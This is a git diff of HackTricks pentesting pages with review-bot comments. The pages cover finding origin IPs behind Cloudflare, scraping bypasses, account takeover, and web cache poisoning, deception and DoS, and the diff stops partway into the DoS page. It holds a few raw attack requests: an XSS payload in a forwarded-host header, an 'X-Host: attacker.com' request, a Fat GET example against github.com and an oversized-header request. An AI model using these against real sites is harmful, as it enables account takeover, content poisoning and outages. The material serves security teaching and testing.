* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
</details>
## Common Techniques to Uncover Cloudflare
## Common Techniques to Uncover Cloudflare
* You can use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.
* You can use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.
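Review bot: the Twitter link text `@carlospolopm` points at `https://twitter.com/hacktricks_live`, so the handle shown does not match the profile linked (the footer earlier in this same merge uses `@hacktricks_live` for that URL); pick one handle and use it everywhere. The only change in this hunk is escaping the underscore in the URL, which leaves the mismatch in place.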
@ -30,6 +29,7 @@ Other ways to support HackTricks:
* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) or [https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com). Or use the tool [CloudPeler](https://github.com/zidansec/CloudPeler) (which uses that API)
* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) or [https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com). Or use the tool [CloudPeler](https://github.com/zidansec/CloudPeler) (which uses that API)
* Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)
* Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)
* [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs.
* [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs.
* [**CloakQuest3r**](https://github.com/spyboy-productions/CloakQuest3r): CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare and other alternatives, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield.
* [Censys](https://search.censys.io/)
* [Censys](https://search.censys.io/)
* [Shodan](https://shodan.io/)
* [Shodan](https://shodan.io/)
* [Bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)
* [Bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)
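Review bot: the new CloakQuest3r bullet is the tool's own marketing copy ("powerful Python tool meticulously crafted", "protective shield") and runs to three sentences where every neighbouring entry uses one; cut it to what the tool does, along the lines of "[CloakQuest3r](https://github.com/spyboy-productions/CloakQuest3r) tries to find the origin IP of websites behind Cloudflare", and, as the CloudFlair entry above does, say which data sources it queries if that is known.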
@ -49,7 +49,7 @@ for ir in `curl https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixe
done
done
```
```
## Uncovering Cloudflare from Cloud machines
## Uncovering Cloudflare from Cloud infrastructure
Note that even if this was done for AWS machines, it could be done for any other cloud provider.
Note that even if this was done for AWS machines, it could be done for any other cloud provider.
@ -80,7 +80,7 @@ This mechanism relies on **client** [**SSL certificates**](https://socradar.io/h
Instead of configuring it's own certificate, customers can simple use Cloudflare’s certificate to allow any connection from Cloudflare, **regardless of the tenant**.
Instead of configuring it's own certificate, customers can simple use Cloudflare’s certificate to allow any connection from Cloudflare, **regardless of the tenant**.
{% hint style="danger" %}
{% hint style="danger" %}
Therefore, an attacker could just set a **domain in Cloudflare using CLoudflares certificate and point** it to the **victim** domain **IP** address. This way, setting his domain completely unprotected, Cloudflare won't protect the requests sent.
Therefore, an attacker could just set a **domain in Cloudflare using Cloudflare's certificate and point** it to the **victim** domain **IP** address. This way, setting his domain completely unprotected, Cloudflare won't protect the requests sent.
{% endhint %}
{% endhint %}
More info [**here**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/).
More info [**here**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/).
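Review bot: the fix of "CLoudflares" to "Cloudflare's" leaves two errors in the unchanged line just above it: "configuring it's own certificate" should be "its own certificate", and "customers can simple use" should be "simply use". In the hint itself, "setting his domain completely unprotected" reads better as "leaving their domain completely unprotected".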
@ -100,6 +100,12 @@ Sometimes you just want to bypass Cloudflare to only scrape the web page. There
* Use Google cache: `https://webcache.googleusercontent.com/search?q=cache:https://www.petsathome.com/shop/en/pets/dog`
* Use Google cache: `https://webcache.googleusercontent.com/search?q=cache:https://www.petsathome.com/shop/en/pets/dog`
* Use other cache services such as [https://archive.org/web/](https://archive.org/web/)
* Use other cache services such as [https://archive.org/web/](https://archive.org/web/)
### Tools
Some tools like the following ones can bypass (or were able to bypass) Cloudflare's protection against scraping:
* [https://github.com/sarperavci/CloudflareBypassForScraping](https://github.com/sarperavci/CloudflareBypassForScraping)
### Cloudflare Solvers
### Cloudflare Solvers
There have been a number of Cloudflare solvers developed:
There have been a number of Cloudflare solvers developed:
@ -122,13 +128,14 @@ Use a headless browser that isn't deetcted as an automated browser (you might ne
### Smart Proxy With Cloudflare Built-In Bypass <a href="#option-5-smart-proxy-with-cloudflare-built-in-bypass" id="option-5-smart-proxy-with-cloudflare-built-in-bypass"></a>
### Smart Proxy With Cloudflare Built-In Bypass <a href="#option-5-smart-proxy-with-cloudflare-built-in-bypass" id="option-5-smart-proxy-with-cloudflare-built-in-bypass"></a>
**Smart proxies** proxies are continuously updated by specialized companies, aiming to outmaneuver Cloudflare's security measures (as thats their business).
**Smart proxies** proxies are continuously updated by specialized companies, aiming to outmaneuver Cloudflare's security measures (as thats their business).
Som of them are:
Som of them are:
* [ScraperAPI](https://www.scraperapi.com/?fp_ref=scrapeops)
* [ScraperAPI](https://www.scraperapi.com/?fp\_ref=scrapeops)
* [Scrapingbee](https://www.scrapingbee.com/?fpr=scrapeops)
* [Scrapingbee](https://www.scrapingbee.com/?fpr=scrapeops)
* [Oxylabs](https://oxylabs.go2cloud.org/aff_c?offer_id=7&aff_id=379&url_id=32)
* [Oxylabs](https://oxylabs.go2cloud.org/aff\_c?offer\_id=7\&aff\_id=379\&url\_id=32)
* [Smartproxy](https://prf.hn/click/camref:1100loxdG/[p_id:1100l442001]/destination:https%3A%2F%2Fsmartproxy.com%2Fscraping%2Fweb) are noted for their proprietary Cloudflare bypass mechanisms.
* [Smartproxy](https://prf.hn/click/camref:1100loxdG/\[p\_id:1100l442001]/destination:https%3A%2F%2Fsmartproxy.com%2Fscraping%2Fweb) are noted for their proprietary Cloudflare bypass mechanisms.
For those seeking an optimized solution, the [ScrapeOps Proxy Aggregator](https://scrapeops.io/proxy-aggregator/) stands out. This service integrates over 20 proxy providers into a single API, automatically selecting the best and most cost-effective proxy for your target domains, thus offering a superior option for navigating Cloudflare's defenses.
For those seeking an optimized solution, the [ScrapeOps Proxy Aggregator](https://scrapeops.io/proxy-aggregator/) stands out. This service integrates over 20 proxy providers into a single API, automatically selecting the best and most cost-effective proxy for your target domains, thus offering a superior option for navigating Cloudflare's defenses.
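Review bot: the list fix still leaves "Som of them are:" ("Some"), "**Smart proxies** proxies" (duplicated word) and "as thats their business" ("that's"), and the hunk header shows "deetcted" in the surrounding text. Separately, every entry in this list carries an affiliate tracking parameter (`fp_ref=scrapeops`, `fpr=scrapeops`, `aff_id=379`, `camref:1100loxdG`) copied from the ScrapeOps article cited under References; escaping the underscores keeps those trackers intact, and the links should be reduced to the plain vendor URLs.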
@ -142,8 +149,6 @@ Reverse engineering Cloudflare's anti-bot measures is a tactic used by smart pro
Find more info about how to do this in the [original article](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/).
Find more info about how to do this in the [original article](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/).
## References
## References
* [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
* [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
@ -157,7 +162,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
</details>
@ -9,7 +9,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
|
</details>
|
||||||
|
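Review bot: the backslash in the new link destination `https://twitter.com/hacktricks\_live` is unnecessary, since `_` has no special meaning inside a markdown link destination, and it makes the raw URL harder to search for; while this line is being touched, the visible handle `@carlospolopm` should also be brought in line with the `hacktricks_live` destination it points to. The same footer hunk is repeated in the other files of this commit and the same comment applies there.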
@ -38,7 +38,6 @@ Should the target system allow the **reset link to be reused**, efforts should b
|
||||||
2. One should wait until the victim signs up using OAuth and confirms the account.
|
2. One should wait until the victim signs up using OAuth and confirms the account.
|
||||||
3. It is hoped that the regular signup will be confirmed, allowing access to the victim's account.
|
3. It is hoped that the regular signup will be confirmed, allowing access to the victim's account.
|
||||||
|
|
||||||
|
|
||||||
## **CORS Misconfiguration to Account Takeover**
|
## **CORS Misconfiguration to Account Takeover**
|
||||||
|
|
||||||
If the page contains **CORS missconfigurations** you might be able to **steal sensitive information** from the user to **takeover his account** or make him change auth information for the same purpose:
|
If the page contains **CORS missconfigurations** you might be able to **steal sensitive information** from the user to **takeover his account** or make him change auth information for the same purpose:
|
||||||
|
@ -97,16 +96,26 @@ If the authentication response could be **reduced to a simple boolean just try t
|
||||||
## Response Manipulation
|
## Response Manipulation
|
||||||
|
|
||||||
1. **Code Manipulation**: The status code is altered to `200 OK`.
|
1. **Code Manipulation**: The status code is altered to `200 OK`.
|
||||||
2. **Code and Body Manipulation**:
|
2. **Code and Body Manipulation**:
|
||||||
- The status code is changed to `200 OK`.
|
* The status code is changed to `200 OK`.
|
||||||
- The response body is modified to `{"success":true}` or an empty object `{}`.
|
* The response body is modified to `{"success":true}` or an empty object `{}`.
|
||||||
|
|
||||||
These manipulation techniques are effective in scenarios where JSON is utilized for data transmission and receipt.
|
These manipulation techniques are effective in scenarios where JSON is utilized for data transmission and receipt.
|
||||||
|
|
||||||
|
## Change email of current session
|
||||||
|
|
||||||
|
From [this report](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea):
|
||||||
|
|
||||||
|
* Attacker requests to change his email with a new one
|
||||||
|
* Attacker receives a link to confirm the change of the email
|
||||||
|
* Attacker send the victim the link so he clicks it
|
||||||
|
* The victims email is changed to the one indicated by the attacker
|
||||||
|
* The attack can recover the password and take over the account
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050](https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050)
|
* [https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050](https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050)
|
||||||
|
* [https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
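Review bot: the new "Change email of current session" list has grammar slips that should be fixed before merge: `* Attacker send the victim the link so he clicks it` should read "Attacker sends", `* The victims email is changed to the one indicated by the attacker` needs "victim's", and `* The attack can recover the password and take over the account` should say "The attacker". The steps also never state why the chain works; one sentence noting that the confirmation link issued for the attacker's pending change is applied to whichever logged-in session opens it, and that binding the token to the requesting account (and re-authenticating before an email change) closes it, would make the section useful rather than just a retelling of the linked report.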
@ -117,7 +126,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
\
|
\
|
||||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||||
|
@ -41,13 +41,19 @@ The execution of a cache poisoning assault involves several steps:
|
||||||
|
|
||||||
### Discovery: Check HTTP headers
|
### Discovery: Check HTTP headers
|
||||||
|
|
||||||
Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
|
Usually, when a response was **stored in the cache** there will be a **header indicating so**, you can check which headers you should pay attention to in this post: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
|
||||||
|
|
||||||
### Discovery: Caching 400 code
|
### Discovery: Caching error codes 
|
||||||
|
|
||||||
If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).\
|
If you are thinking that the response is being stored in a cache, you could try to **send requests with a bad header**, which should be responded to with a **status code 400**. Then try to access the request normally and if the **response is a 400 status code**, you know it's vulnerable (and you could even perform a DoS).
|
||||||
A badly configured header could be just `\:` as a header.\
|
|
||||||
_Note that sometimes these kinds of status codes aren't cached so this test will be useless._
|
You can find more options in:
|
||||||
|
|
||||||
|
{% content-ref url="cache-poisoning-to-dos.md" %}
|
||||||
|
[cache-poisoning-to-dos.md](cache-poisoning-to-dos.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
However, note that **sometimes these kinds of status codes aren't cached** so this test could not be reliable.
|
||||||
|
|
||||||
### Discovery: Identify and evaluate unkeyed inputs
|
### Discovery: Identify and evaluate unkeyed inputs
|
||||||
|
|
||||||
|
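Review bot: the renamed heading `### Discovery: Caching error codes ` carries a trailing space, and the reworded note `so this test could not be reliable` should read "might not be reliable" (the removed `so this test will be useless` said the same thing more bluntly). Moving the `\:` malformed-header sentence into the new cache-poisoning-to-dos.md page and linking it from here with the content-ref is fine, but the lead-in `You can find more options in:` is now the only line between the paragraph and the link; consider naming what the linked page contains (error responses the origin returns that the cache still stores) so the reader knows why to follow it.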
@ -86,6 +92,12 @@ X-Forwarded-Host: a."><script>alert(1)</script>"
|
||||||
|
|
||||||
_Note that this will poison a request to `/en?region=uk` not to `/en`_
|
_Note that this will poison a request to `/en?region=uk` not to `/en`_
|
||||||
|
|
||||||
|
### Cache poisoning to DoS
|
||||||
|
|
||||||
|
{% content-ref url="cache-poisoning-to-dos.md" %}
|
||||||
|
[cache-poisoning-to-dos.md](cache-poisoning-to-dos.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Using web cache poisoning to exploit cookie-handling vulnerabilities
|
### Using web cache poisoning to exploit cookie-handling vulnerabilities
|
||||||
|
|
||||||
Cookies could also be reflected on the response of a page. If you can abuse it to cause an XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
|
Cookies could also be reflected on the response of a page. If you can abuse it to cause an XSS for example, you could be able to exploit XSS in several clients that load the malicious cache response.
|
||||||
|
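Review bot: this is the second content-ref to `cache-poisoning-to-dos.md` added to the same page in this commit (the first sits in the "Discovery: Caching error codes" section), so the new `### Cache poisoning to DoS` heading only duplicates a pointer. Either keep one of the two or give this section a sentence of its own, for example on when a cached error response turns a poisoning finding into a denial of service for every client sharing the cache key.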
@ -124,9 +136,30 @@ User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
|
||||||
X-Host: attacker.com
|
X-Host: attacker.com
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Fat Get
|
||||||
|
|
||||||
|
Send a GET request with the request in the URL and in the body. If the web server uses the one from the body but the cache server caches the one from the URL, anyone accessing that URL will actually use the parameter from the body. Like the vuln James Kettle found at the Github website:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /contact/report-abuse?report=albinowax HTTP/1.1
|
||||||
|
Host: github.com
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 22
|
||||||
|
|
||||||
|
report=innocent-victim
|
||||||
|
```
|
||||||
|
|
||||||
|
There it a portswigger lab about this: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
|
||||||
|
|
||||||
|
### Parameter Cloacking
|
||||||
|
|
||||||
|
For example it's possible to separate **parameters** in ruby servers using the char **`;`** instead of **`&`**. This could be used to put unkeyed parameters values inside keyed ones and abuse them.
|
||||||
|
|
||||||
|
Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
|
||||||
|
|
||||||
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
|
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
|
||||||
|
|
||||||
Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
|
Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
|
||||||
|
|
||||||
### Automated testing for Web Cache Poisoning
|
### Automated testing for Web Cache Poisoning
|
||||||
|
|
||||||
|
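Review bot: `### Parameter Cloacking` should be `### Parameter Cloaking`, and `There it a portswigger lab about this` should read "There is a PortSwigger lab about this". In the Fat GET paragraph, `Send a GET request with the request in the URL and in the body` presumably means the parameter, not the request, in both places; saying "with the same parameter in the query string and in the body" matches the `report=albinowax` / `report=innocent-victim` example that follows. The `;` separator sentence states the impact (`put unkeyed parameters values inside keyed ones`) without the consequence for the reader; one clause noting that the cache keys on the whole string while the origin splits on `;` and reads the hidden value would complete the thought.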
@ -134,7 +167,9 @@ The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vul
|
||||||
|
|
||||||
Example usage: `wcvs -u example.com`
|
Example usage: `wcvs -u example.com`
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
\
|
\
|
||||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||||
|
@ -142,6 +177,8 @@ Get Access Today:
|
||||||
|
|
||||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Vulnerable Examples
|
## Vulnerable Examples
|
||||||
|
|
||||||
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
|
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
|
||||||
|
@ -201,7 +238,7 @@ Then, the **attacker** can access _http://www.example.com/home.php/non-existent.
|
||||||
|
|
||||||
Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
|
Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
|
||||||
|
|
||||||
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
|
Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
|
||||||
|
|
||||||
## Automatic Tools
|
## Automatic Tools
|
||||||
|
|
||||||
|
@ -216,7 +253,7 @@ Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request S
|
||||||
* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
|
* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
|
||||||
* [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
|
* [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
\
|
\
|
||||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
172
pentesting-web/cache-deception/cache-poisoning-to-dos.md
Normal file
|
@ -0,0 +1,172 @@
|
||||||
|
# Cache Poisoning to DoS
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
In this page you can find different variations to try to make the **web server respond with errors** to requests that are **valid for the cache servers**
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
* **HTTP Header Oversize (HHO)**
|
||||||
|
|
||||||
|
Send a request with a header size larger than the one supported by the web server but smaller than the one supported by the cache server. The web server will respond with a 400 response which might be cached:
|
||||||
|
|
||||||
|
```
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: redacted.com
|
||||||
|
X-Oversize-Hedear:Big-Value-000000000000000
|
||||||
|
```
|
||||||
|
|
||||||
|
* **HTTP Meta Character (HMC) & Unexpected values**
|
||||||
|
|
||||||
|
